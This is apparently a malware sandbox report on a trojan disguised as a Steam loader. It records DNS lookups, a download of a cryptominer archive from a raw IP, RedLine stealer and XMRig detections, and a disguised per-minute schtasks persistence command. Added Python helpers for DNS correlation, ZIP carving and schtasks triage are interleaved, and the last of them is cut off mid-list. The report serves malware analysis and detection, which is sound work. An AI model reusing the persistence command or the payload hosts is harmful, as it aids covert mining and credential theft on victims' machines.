RT_ICON | 0xc834 | 0x2e8 | data | |
RT_ICON | 0xcb2c | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0xcc64 | 0xea8 | dBase III DBT, version number 0, next free block index 40, 1st item "ff3" | |
RT_ICON | 0xdb1c | 0x8a8 | dBase III DBT, version number 0, next free block index 40, 1st item "ff3" | |
RT_ICON | 0xe3d4 | 0x568 | GLS_BINARY_LSB_FIRST | |
RT_GROUP_ICON | 0xe94c | 0x5a | data | |
RT_VERSION | 0xe9b8 | 0x338 | data | |
RT_MANIFEST | 0xed00 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | English | United States

Imports

DLL | Import
kernel32.dll | GetModuleHandleA
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright (c) ZSqUZ_KBGbBDgyy 2020
Assembly Version | 1.1.2.9
InternalName | Loader.exe
FileVersion | 0.0.4.6
CompanyName | Launchy
Comments | hxz7ffDbexNxYlZ
ProductName | Steam
ProductVersion | 0.0.4.6
FileDescription | 1xLYZusZUdU4_qG
OriginalFilename | Loader.exe

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Network Port Distribution

TCP Packets


UDP Packets

                                                                                                Feb 23, 2021 17:39:41.845001936 CET5445053192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:39:41.897260904 CET53544508.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:39:45.438951969 CET5926153192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:39:45.496206045 CET53592618.8.8.8192.168.2.5
                                                                                                Feb 23, 2021 17:39:46.473696947 CET5715153192.168.2.58.8.8.8
                                                                                                Feb 23, 2021 17:39:46.522680044 CET53571518.8.8.8192.168.2.5

                                                                                                DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 17:37:24.058357954 CET | 192.168.2.5 | 8.8.8.8 | 0xfda1 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Feb 23, 2021 17:37:24.825272083 CET | 192.168.2.5 | 8.8.8.8 | 0xe4db | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001)
Feb 23, 2021 17:37:25.109236956 CET | 192.168.2.5 | 8.8.8.8 | 0x9e26 | Standard query (0) | blog.agencia10x.com | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:00.674447060 CET | 192.168.2.5 | 8.8.8.8 | 0x38b9 | Standard query (0) | iplogger.org | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:03.880925894 CET | 192.168.2.5 | 8.8.8.8 | 0x4bc7 | Standard query (0) | pool.minexmr.com | A (IP address) | IN (0x0001)
Feb 23, 2021 17:39:41.204437971 CET | 192.168.2.5 | 8.8.8.8 | 0x7a45 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Feb 23, 2021 17:39:41.845001936 CET | 192.168.2.5 | 8.8.8.8 | 0xb386 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Feb 23, 2021 17:39:45.438951969 CET | 192.168.2.5 | 8.8.8.8 | 0x1265 | Standard query (0) | whois.iana.org | A (IP address) | IN (0x0001)
Feb 23, 2021 17:39:46.473696947 CET | 192.168.2.5 | 8.8.8.8 | 0xa2ec | Standard query (0) | WHOIS.RIPE.NET | A (IP address) | IN (0x0001)

                                                                                                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 17:37:24.118510962 CET | 8.8.8.8 | 192.168.2.5 | 0xfda1 | No error (0) | iplogger.org | - | 88.99.66.31 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:37:24.882510900 CET | 8.8.8.8 | 192.168.2.5 | 0xe4db | No error (0) | pastebin.com | - | 104.23.99.190 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:37:24.882510900 CET | 8.8.8.8 | 192.168.2.5 | 0xe4db | No error (0) | pastebin.com | - | 104.23.98.190 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:37:25.169492960 CET | 8.8.8.8 | 192.168.2.5 | 0x9e26 | No error (0) | blog.agencia10x.com | - | 172.67.213.210 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:37:25.169492960 CET | 8.8.8.8 | 192.168.2.5 | 0x9e26 | No error (0) | blog.agencia10x.com | - | 104.21.67.51 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:00.725982904 CET | 8.8.8.8 | 192.168.2.5 | 0x38b9 | No error (0) | iplogger.org | - | 88.99.66.31 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:03.940182924 CET | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | pool.minexmr.com | - | 88.99.193.240 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:03.940182924 CET | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | pool.minexmr.com | - | 51.254.84.37 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:03.940182924 CET | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | pool.minexmr.com | - | 94.130.165.85 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:03.940182924 CET | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | pool.minexmr.com | - | 51.68.21.186 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:03.940182924 CET | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | pool.minexmr.com | - | 178.32.120.127 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:03.940182924 CET | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | pool.minexmr.com | - | 94.130.165.87 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:03.940182924 CET | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | pool.minexmr.com | - | 94.130.164.163 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:38:03.940182924 CET | 8.8.8.8 | 192.168.2.5 | 0x4bc7 | No error (0) | pool.minexmr.com | - | 51.68.21.188 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:39:41.258730888 CET | 8.8.8.8 | 192.168.2.5 | 0x7a45 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 17:39:41.897260904 CET | 8.8.8.8 | 192.168.2.5 | 0xb386 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 17:39:45.496206045 CET | 8.8.8.8 | 192.168.2.5 | 0x1265 | No error (0) | whois.iana.org | ianawhois.vip.icann.org | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 17:39:45.496206045 CET | 8.8.8.8 | 192.168.2.5 | 0x1265 | No error (0) | ianawhois.vip.icann.org | - | 192.0.47.59 | A (IP address) | IN (0x0001)
Feb 23, 2021 17:39:46.522680044 CET | 8.8.8.8 | 192.168.2.5 | 0xa2ec | No error (0) | WHOIS.RIPE.NET | - | 193.0.6.135 | A (IP address) | IN (0x0001)

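The DNS Queries and DNS Answers tables above are separate lists that only tie together through the transaction ID, and two of the answers (api.ip.sb, whois.iana.org) come back as CNAMEs rather than addresses. The following Python is an added example, not part of the Joe Sandbox report: it joins answers to their query by transaction ID and follows CNAME chains to the A record, which is how you turn these two tables into "name the sample asked for, address it got". The log lines are a constructed pipe-delimited transcription of a subset of the rows above (the IDs, names and addresses are the report's); the category labels are the editor's assumptions.

```python
from collections import defaultdict

# Constructed log, one record per line: time|src|dst|txid|Q or R|name|rtype|value.
# Rows are transcribed from the DNS Queries / DNS Answers tables above (a subset), so the
# transaction ids, names and addresses are the report's; the pipe layout is ours.
DNS_LOG = """\
17:37:24.058|192.168.2.5|8.8.8.8|0xfda1|Q|iplogger.org|A|
17:37:24.118|8.8.8.8|192.168.2.5|0xfda1|R|iplogger.org|A|88.99.66.31
17:37:24.825|192.168.2.5|8.8.8.8|0xe4db|Q|pastebin.com|A|
17:37:24.882|8.8.8.8|192.168.2.5|0xe4db|R|pastebin.com|A|104.23.99.190
17:37:24.882|8.8.8.8|192.168.2.5|0xe4db|R|pastebin.com|A|104.23.98.190
17:38:03.880|192.168.2.5|8.8.8.8|0x4bc7|Q|pool.minexmr.com|A|
17:38:03.940|8.8.8.8|192.168.2.5|0x4bc7|R|pool.minexmr.com|A|88.99.193.240
17:38:03.940|8.8.8.8|192.168.2.5|0x4bc7|R|pool.minexmr.com|A|51.254.84.37
17:39:41.204|192.168.2.5|8.8.8.8|0x7a45|Q|api.ip.sb|A|
17:39:41.258|8.8.8.8|192.168.2.5|0x7a45|R|api.ip.sb|CNAME|api.ip.sb.cdn.cloudflare.net
17:39:45.438|192.168.2.5|8.8.8.8|0x1265|Q|whois.iana.org|A|
17:39:45.496|8.8.8.8|192.168.2.5|0x1265|R|whois.iana.org|CNAME|ianawhois.vip.icann.org
17:39:45.496|8.8.8.8|192.168.2.5|0x1265|R|ianawhois.vip.icann.org|A|192.0.47.59
"""

# Analyst-assigned labels for the hostnames in this report (an assumption, not sandbox output).
CATEGORIES = {
    "pool.minexmr.com": "mining-pool",
    "pastebin.com": "paste-service",
    "iplogger.org": "ip-logger",
    "api.ip.sb": "external-ip-check",
    "whois.iana.org": "whois",
}
FIELDS = ("ts", "src", "dst", "txid", "kind", "name", "rtype", "value")


def parse_dns_log(text):
    """Split the pipe-delimited records into dicts; blank lines are ignored."""
    return [dict(zip(FIELDS, line.split("|"))) for line in text.splitlines() if line.strip()]


def correlate(rows):
    """Join answers to their query by transaction id and follow CNAME chains to A records."""
    queries, answers = {}, defaultdict(list)
    for r in rows:
        if r["kind"] == "Q":
            queries[r["txid"]] = r
        else:
            answers[r["txid"]].append(r)

    results = []
    for txid, q in queries.items():
        cnames = {a["name"].lower(): a["value"].lower()
                  for a in answers[txid] if a["rtype"] == "CNAME"}
        a_records = defaultdict(list)
        for a in answers[txid]:
            if a["rtype"] == "A":
                a_records[a["name"].lower()].append(a["value"])
        # Follow the CNAME chain from the queried name; bounded so a looping chain cannot hang us.
        final, hops = q["name"].lower(), 0
        while final in cnames and hops < 8:
            final, hops = cnames[final], hops + 1
        results.append({
            "txid": txid,
            "name": q["name"],
            "asked_at": q["ts"],
            "final_name": final,
            "addresses": a_records.get(final, []),
            "answered": bool(answers[txid]),
            "category": CATEGORIES.get(q["name"].lower(), "uncategorised"),
        })
    return results


def unresolved(results):
    """Queries that got a reply but no A record for the end of the CNAME chain.

    In this capture api.ip.sb is such a case: only the CNAME is listed, so the address
    the sample actually contacted has to be taken from the TCP/TLS data instead.
    """
    return [r["name"] for r in results if r["answered"] and not r["addresses"]]


def address_to_names(results):
    """Invert the view: every resolved IP with the query names that led to it."""
    index = defaultdict(set)
    for r in results:
        for ip in r["addresses"]:
            index[ip].add(r["name"])
    return {ip: sorted(names) for ip, names in index.items()}


if __name__ == "__main__":
    res = correlate(parse_dns_log(DNS_LOG))
    for r in res:
        print(f"{r['asked_at']} {r['name']:<18} {r['category']:<18} -> {r['final_name']} {r['addresses']}")
    print("CNAME-only answers:", unresolved(res))
```

The inverted index from address_to_names is what you feed into a firewall or proxy log search: the miner traffic to the pool is on a non-standard port and never shows up as a hostname there, so the pool's A records are the pivot.
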
                                                                                                HTTP Request Dependency Graph

                                                                                                • 195.2.84.91

                                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49729 | 195.2.84.91 | 80 | C:\Users\user\AppData\Local\zmql3v0y.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 17:37:53.245167971 CET | 9238 | OUT | GET /cpu.zip HTTP/1.1
Host: 195.2.84.91
Connection: Keep-Alive
Feb 23, 2021 17:37:53.333851099 CET | 9240 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Tue, 23 Feb 2021 16:37:53 GMT
                                                                                                Content-Type: application/zip
                                                                                                Content-Length: 6296834
                                                                                                Connection: keep-alive
                                                                                                Keep-Alive: timeout=60
                                                                                                Last-Modified: Sat, 20 Feb 2021 21:11:22 GMT
                                                                                                ETag: "601502-5bbcb02b93280"
                                                                                                Accept-Ranges: bytes
                                                                                                Data Raw: 50 4b 03 04 14 00 00 00 08 00 01 7a 3a 52 67 77 19 1f bf 02 00 00 e3 08 00 00 0b 00 00 00 63 6f 6e 66 69 67 2e 6a 73 6f 6e ad 56 c9 6e db 30 10 bd e7 2b 02 9d 43 d7 76 e1 16 e8 2d 40 72 4b 51 20 69 51 14 45 61 8c a9 b1 c4 9a e2 b0 43 ca 4b 8b fc 7b 49 79 89 44 d3 45 0e 95 01 43 9a c7 19 3d 3e ce a2 3f 57 d7 e1 2a c0 aa e2 c3 f5 fe a1 33 a8 32 3c 9b 56 eb 9b 17 db 86 78 85 2c 4e 50 87 3c ef 17 14 b5 f7 76 18 02 0d 2c 34 c6 c5 4b d0 0e 7b 81 6a 72 3e 98 8b c9 f4 fd 68 1c 7e 93 a2 07 5a e2 08 8e 7b 26 90 12 9d 13 9e 56 68 ce 69 31 3a cf 4a fa ee 55 9e 5b 1c f0 82 d6 93 83 35 1e b0 83 75 01 72 55 31 b5 26 a1 57 48 d2 c4 6e bf f8 68 f3 ca eb c4 9f c1 94 d4 6c 13 cd 8c 8a cc c5 e4 66 68 13 b0 de 4e 53 a0 a1 32 c6 ec f8 f5 b7 3f a9 16 c2 42 85 2e a3 1b 97 8d e3 01 91 ce bc e1 ac 59 82 ac 71 fe 8b 72 91 4c db c0 b9 87 93 0c 5e d6 16 ca b9 65 5c 62 b8 9f 1f 78 4e 06 a2 4a db 5e 3a eb 24 64 dd 56 78 da cf 45 4c fc 54 3e 97 27 1b 01 e8 ce 4f dc b2 22 56 7e 77 8e 34 d8 10 ef 84 25 d2 99 78 3b 85 3a c3 b1 81 ad f0 35 23 94 4e d4 ca 44 26 93 f1 20 ff 5c 73 ee 05 5c 91 99 0a d5 58 9d f0 e8 3c 3c d3 62 e3 45 8c ed d4 ef 28 e1 6c d6 8f 29 cd 9b 71 86 a2 34 42 2b 8f 59 6c 05 1b 4b 9b 23 30 38 10 b2 68 a4 7e 6d fd 75 99 71 be 23 4d 50 22 67 e4 d6 e0 97 c4 51 83 e2 f6 e3 5d 3f 5b a1 d4 99 c4 fb c7 d6 fa 5b 1b a6 54 5b c2 6b f9 5f 22 6a d6 cd ff a2 53 92 01 8f 42 e3 1a 63 c8 c9 d0 4c eb d0 07 2d d3 76 d7 c3 34 55 62 a9 34 0e 78 15 31 15 63 0a 7f 3f bd f9 65 8b dd 02 d0 15 ed 5d 0e 2e 2f 0c 49 99 3c d2 72 24 75 60 33 5a 4f 47 db 86 55 35 92 d4 7c 78 1b ae 22 5d ee 3a b5 8a 6f 9f be 3c ce bf de 3e 3c dc 7f 9e df de dd 3d de 3f 3d a5 4b 2d b8 c8 b6 d8 a6 40 88 2f 4e 9d 3f c1 8c 92 58 83 ab 8f 4a 26 f0 0a d1 82 56 6b bc 80 5f 6a 1e 1d e8 3b f5 96 19 b7 80 04 bd 4d 85 6c 79 5f b5 19 6a 25 84 8e 60 2e 44 70 24 57 6e 96 77 74 a8 97 22 fc a1 f4 fd 71 17 af e7 ee ee c7 f1 80 e3 cb 85 57 4d 
dc de bb 43 89 17 35 82 f6 b5 c8 83 65 a3 92 71 82 61 82 75 9d 6e d6 b3 84 3e 06 e1 e8 7a 56 b7 73 21 cb 92 91 e5 b5 7b 6d e1 84 94 f5 24 f7 09 99 d4 8e 44 f6 79 eb 7c 85 99 4e 2b 95 ad 91 dd 45 a0 0d b5 95 41 cb 30 5d 18 9a dc 17 44 cc 52 11 a6 41 72 94 45 a8 b5 05 75 32 1c f5 db c4 29 35 54 b0 53 4a 90 11 0b f0 1e 79 77 2a ea e7 ab bf 50 4b 03 04 14 00 00 00 08 00 54 22 55 52 75 cb 47 e4 24 f1 5f 00 a8 20 69 00 07 00 00 00 63 70 75 2e 65 78 65 ec 5a 67 38 9c c1 16 5e bd f7 1e ac 2e da 25 11 2d 08 bb ca ea bd 5b 96 d5 3b 57 09 82 20 08 a2 13 bd 44 59 9d e8 65 b5 25 88 84 10 82 88 16 36 ba 10 5c d1 89 bb dc de ef cf fb e3 ce b3 fb 9c ef 9b 79 e7 cc 99 73 e6 9d 6f bf 39 ab 65 9e 0c c0 01 00 00 b8 98 ef f5 35 00 d0 0e f8 43 01 01 fe 73 b9 87 05 00 90 b3 75 90 03 9a 89 46 39 da b1 34 47 39 0c 9d 9c 7d d8 bd bc 3d 1d bd e1 ee ec b6 70 0f 0f 4f 5f 76 1b 7b 76 6f 3f 0f 76 67 0f 76 25 1d 03 76 77 4f 3b 7b 61 32 32 62 ee 3f ea f0 0a 7e fc 59 8c 95 31 ea 4f 5f 4f 3f 96 48 e1 5b c9 1c f9 f0 56 b2 46 5e 62 64 55 f7 52 d4 3d 8c 7c e1 c6 12 79 f7 56 32 47 ca dd 4a d6 c8 22 8c 2c f2 64 89 e4 bd c5 33 45 72 dc ea 62 8a 72 65 61 8c 8a c7 e0 05 31 f7 25 98 76 00 db 0d 8e 2a b2 f7 16 cf 1c 79 ef 56 6e 44 89 df e2 93 30 f2 e6 fe 4e e4 8d d4 77 b6 75 ba b1 e7 ef e7 ac ab 0c 00 d8 3d 27 03 9c 4e 52 58
                                                                                                Data Ascii: PKz:Rgwconfig.jsonVn0+Cv-@rKQ iQEaCK{IyDEC=>?W*32<Vx,NP<v,4K{jr>h~Z{&Vhi1:JU[5urU1&WHnhlfhNS2?B.YqrL^e\bxNJ^:$dVxELT>'O"V~w4%x;:5#ND& \s\X<<bE(l)q4B+YlK#08h~muq#MP"gQ]?[[T[k_"jSBcL-v4Ub4x1c?e]./I<r$u`3ZOGU5|x"]:o<><=?=K-@/N?XJ&Vk_j;Mly_j%`.Dp$Wnwt"qWMC5eqaun>zVs!{m$Dy|N+EA0]DRArEu2)5TSJyw*PKT"URuG$_ icpu.exeZg8^.%-[;W DYe%6\yso9e5CsuF94G9}=pO_v{vo?vgv%vwO;{a22b?~Y1O_O?H[VF^bdUR=|yV2GJ",d3Erbrea1%v*yVnD0Nwu='NRX


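The hex at the start of the /cpu.zip response body is plain ZIP structure: two local-file headers whose member names, config.json and cpu.exe, are readable in the dump, which is what ties the download by zmql3v0y.exe to the XMRig detections on that process. The following Python is an added example, not part of the Joe Sandbox report: it carves ZIP local-file headers out of a hex fragment and decodes method, sizes, CRC and timestamp from each. It uses only the header bytes shown above (the deflate payloads between them are not reproduced on the page) and the Content-Length from the response header; the field layout is the standard one from the ZIP APPNOTE, nothing else is assumed.

```python
import re
import struct
from datetime import datetime

# Hex transcribed from the "Data Raw" field of the /cpu.zip response above. Only the two
# ZIP local-file headers are reproduced; the deflate payload between them is not on the page.
CAPTURED_HEX = (
    "50 4b 03 04 14 00 00 00 08 00 01 7a 3a 52 67 77 19 1f bf 02 00 00 e3 08 00 00 "
    "0b 00 00 00 63 6f 6e 66 69 67 2e 6a 73 6f 6e "
    "50 4b 03 04 14 00 00 00 08 00 54 22 55 52 75 cb 47 e4 24 f1 5f 00 a8 20 69 00 "
    "07 00 00 00 63 70 75 2e 65 78 65"
)
CONTENT_LENGTH = 6296834  # Content-Length of the same HTTP response

LOCAL_SIG = b"PK\x03\x04"
# version, flags, method, mod time, mod date, crc32, compressed size, uncompressed size,
# filename length, extra-field length (all little-endian, APPNOTE section 4.3.7)
LOCAL_FMT = "<4sHHHHHIIIHH"
LOCAL_LEN = struct.calcsize(LOCAL_FMT)  # 30 bytes

METHODS = {0: "stored", 8: "deflate"}


def dos_datetime(dos_date, dos_time):
    """Decode the packed MS-DOS date/time pair used in ZIP headers."""
    return datetime(
        1980 + (dos_date >> 9), (dos_date >> 5) & 0xF, dos_date & 0x1F,
        dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2,
    )


def carve_local_headers(blob):
    """Return one dict per ZIP local-file header found in blob.

    Scans for the PK\\x03\\x04 signature instead of trusting offsets, so it copes
    with the truncated fragments a sandbox hex dump or a partial PCAP gives you.
    When a whole compressed payload is present it is skipped, so a signature that
    happens to occur inside compressed data is not mistaken for a header.
    """
    entries = []
    pos = blob.find(LOCAL_SIG)
    while pos != -1 and pos + LOCAL_LEN <= len(blob):
        (_, _version, flags, method, mtime, mdate, crc,
         csize, usize, name_len, extra_len) = struct.unpack_from(LOCAL_FMT, blob, pos)
        name_start = pos + LOCAL_LEN
        name = blob[name_start:name_start + name_len].decode("cp437", "replace")
        entries.append({
            "offset": pos,
            "name": name,
            "method": METHODS.get(method, f"method {method}"),
            "encrypted": bool(flags & 0x1),
            # bit 3 set means sizes/CRC live in a trailing data descriptor and read as 0 here
            "sizes_deferred": bool(flags & 0x8),
            "compressed": csize,
            "uncompressed": usize,
            "crc32": f"{crc:08x}",
            "mtime": dos_datetime(mdate, mtime),
        })
        nxt = name_start + name_len + extra_len
        if nxt + csize <= len(blob):
            nxt += csize
        pos = blob.find(LOCAL_SIG, nxt)
    return entries


def payload_fits(entries, content_length):
    """Headers plus compressed payloads must fit inside the HTTP body."""
    need = sum(LOCAL_LEN + len(e["name"].encode("cp437")) + e["compressed"] for e in entries)
    return need <= content_length


def summarize(hexdump=CAPTURED_HEX):
    blob = bytes.fromhex(re.sub(r"\s+", "", hexdump))
    return carve_local_headers(blob)


if __name__ == "__main__":
    found = summarize()
    for e in found:
        print(f"{e['name']:<12} {e['method']:<8} {e['compressed']:>8} -> {e['uncompressed']:>8} bytes"
              f"  crc={e['crc32']}  mtime={e['mtime']:%Y-%m-%d %H:%M:%S}")
    print("members fit in Content-Length:", payload_fits(found, CONTENT_LENGTH))
```

Run against the fragment above it reports config.json (703 bytes deflated, 2275 uncompressed, dated 2021-01-26) and cpu.exe (about 6.0 MB deflated, 6.6 MB uncompressed, dated 2021-02-21), and both members fit inside the 6296834-byte body, so the capture is consistent with a complete two-file archive. The timestamps are the packer's local clock and carry no timezone, so treat them as ordering hints, not evidence.
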
                                                                                                HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Feb 23, 2021 17:37:24.416266918 CET | 88.99.66.31 | 443 | 192.168.2.5 | 49719 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
Certificate chain presented by the server (Subject | Issuer | Not Before | Not After):
• CN=*.iplogger.org | CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | Fri Nov 20 01:00:00 CET 2020 | Sun Nov 21 00:59:59 CET 2021
• CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB | CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | Fri Nov 02 01:00:00 CET 2018 | Wed Jan 01 00:59:59 CET 2031
• CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Tue Mar 12 01:00:00 CET 2019 | Mon Jan 01 00:59:59 CET 2029

Feb 23, 2021 17:37:24.969533920 CET | 104.23.99.190 | 443 | 192.168.2.5 | 49720 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
Certificate chain presented by the server (Subject | Issuer | Not Before | Not After):
• CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Mon Aug 17 02:00:00 CEST 2020 | Tue Aug 17 14:00:00 CEST 2021
• CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025

Feb 23, 2021 17:37:25.282681942 CET | 172.67.213.210 | 443 | 192.168.2.5 | 49721 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 3b5074b1b5d032e5620f69f9f700ff0e
Certificate chain presented by the server (Subject | Issuer | Not Before | Not After):
• CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US | CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | Mon Aug 17 02:00:00 CEST 2020 | Tue Aug 17 14:00:00 CEST 2021
• CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Mon Jan 27 13:48:08 CET 2020 | Wed Jan 01 00:59:59 CET 2025

                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior

                                                                                                System Behavior

                                                                                                General

                                                                                                Start time:17:37:19
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe'
                                                                                                Imagebase:0x2e0000
                                                                                                File size:2817248 bytes
                                                                                                MD5 hash:BC584A3BE92CFDFDA79446372FFFA46D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:17:37:35
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\AppData\Local\pg2bsuqa.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Local\pg2bsuqa.exe'
                                                                                                Imagebase:0xef0000
                                                                                                File size:4964504 bytes
                                                                                                MD5 hash:70DCA411445D3B4394D9C467BF3FF994
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 24%, Metadefender, Browse
                                                                                                • Detection: 66%, ReversingLabs
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:17:37:40
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Local\zmql3v0y.exe'
                                                                                                Imagebase:0xb30000
                                                                                                File size:2611424 bytes
                                                                                                MD5 hash:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000003.282484459.0000000001AC0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000003.318537012.0000000003391000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 61%, ReversingLabs
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:17:37:51
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                                                                                                Imagebase:0x1290000
                                                                                                File size:185856 bytes
                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

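The schtasks command line above is the persistence the "Uses schtasks.exe or at.exe to add and modify task schedules" signature fires on: a MINUTE trigger with /mo 1 re-launches the miner copy under AppData\Roaming (a file whose name is a lookalike of RuntimeBroker.exe) every minute, under a task name dressed up as a Microsoft service. The following Python is an added triage helper, not part of the Joe Sandbox report: it parses schtasks /create command lines out of process-creation events and states what is notable about each. The sample events are constructed; the first is the command line from this report (with the single quotes as the sandbox rendered them), the others are made up for contrast. The directory list, the branding regex and the five-minute watchdog threshold are the editor's assumptions.

```python
import re

# Constructed process-creation records. The first is the schtasks command line recorded in this
# report (quotes as the sandbox rendered them); the rest are made-up benign and borderline cases.
SAMPLE_EVENTS = [
    "'C:\\Windows\\System32\\schtasks.exe' /create /sc MINUTE /mo 1 "
    "/tn 'Windows Service Microsoft Corporation' "
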